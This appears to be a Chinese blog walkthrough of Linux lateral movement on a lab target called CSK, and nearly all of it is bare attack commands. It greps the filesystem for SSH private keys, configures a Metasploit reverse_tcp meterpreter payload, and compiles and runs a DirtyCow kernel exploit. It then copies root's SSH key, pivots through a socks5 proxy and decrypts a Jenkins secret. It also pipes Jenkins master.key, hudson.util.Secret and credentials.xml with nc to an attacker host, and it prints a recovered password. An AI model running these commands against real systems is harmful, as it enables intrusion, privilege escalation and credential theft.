其他
Linux横向移动手法-CSK靶机
前言
敏感文件
~/.ssh/config #配置 ssh 连接相关参数的配置文件
~/.ssh/known_hosts # 该服务器所有登录过的服务器的信息
~/.bash_history # 我们通过历史命令可以看到该服务器中有没有使用ssh私钥去远程连接服务器
搜索含有SSH凭证文件
grep -ir "BEGIN RSA PRIVATE KEY" /*
grep -ir "BEGIN DSA PRIVATE KEY" /*
grep -ir "BEGIN OPENSSH PRIVATE KEY" /*
场景演示
set rhost 172.16.250.10
set rport 80
set payload linux/x64/meterpreter/reverse_tcp
set lhot 172.160.250.128
set lport 4444
upload /root/Desktop/linux-exploit-suggester.sh /tmp/aa.sh
shell
python3 -c "import pty;pty.spawn('/bin/bash')"
chmod u+x /tmp/aa.sh
./tmp/aa.sh
upload /root/Desktop/dirtycow-mem.c /tmp/cow.c
shell
python3 -c "import pty;pty.spawn('/bin/bash')"
gcc -Wall -o /tmp/dirtycow /tmp/cow.c -ldl -lpthread
chmod u+x /tmp/dirtycow
./tmp/dirtycow
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
echo 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn
cp ~/.ssh/id_rsa /tmp/id_rsa
chmod 777 /tmp/id_rsa
exit
download /tmp/id_rsa /root/is_rsa
chmod 0700 id_rsa
ssh -i id_rsa root@172.16.250.30
use auxiliary/server/socks5
set srvhost 172.16.250.128
run
proxychains firefox
2M0vgELkx9OMFTP8UCoNNneTI7CVjBr9sKSCtKoUl08=
println(hudson.util.Secret.fromString("{2M0vgELkx9OMFTP8UCoNNneTI7CVjBr9sKSCtKoUl08=}").getPlainText())
nc -lvp 8888 > master.key
nc -lvp 8888 > hudson.util.Secret
nc -lvp 8888 > credentials.xml
nc 172.16.250.128 8888 < /home/jenkins/secrets/hudson.util.Secret
nc 172.16.250.128 8888 < /home/jenkins/secrets/master.key
nc 172.16.250.128 8888 < /home/jenkins/credentials.xml
git clone https://github.com/cheetz/jenkins-decrypt.git
python3 decrypt.py master.key hudson.util.Secret credentials.xml
)uDvra{4UL^;r?*h
proxychains ssh db_backup@172.16.250.50
sudo su
往期推荐
E
N
D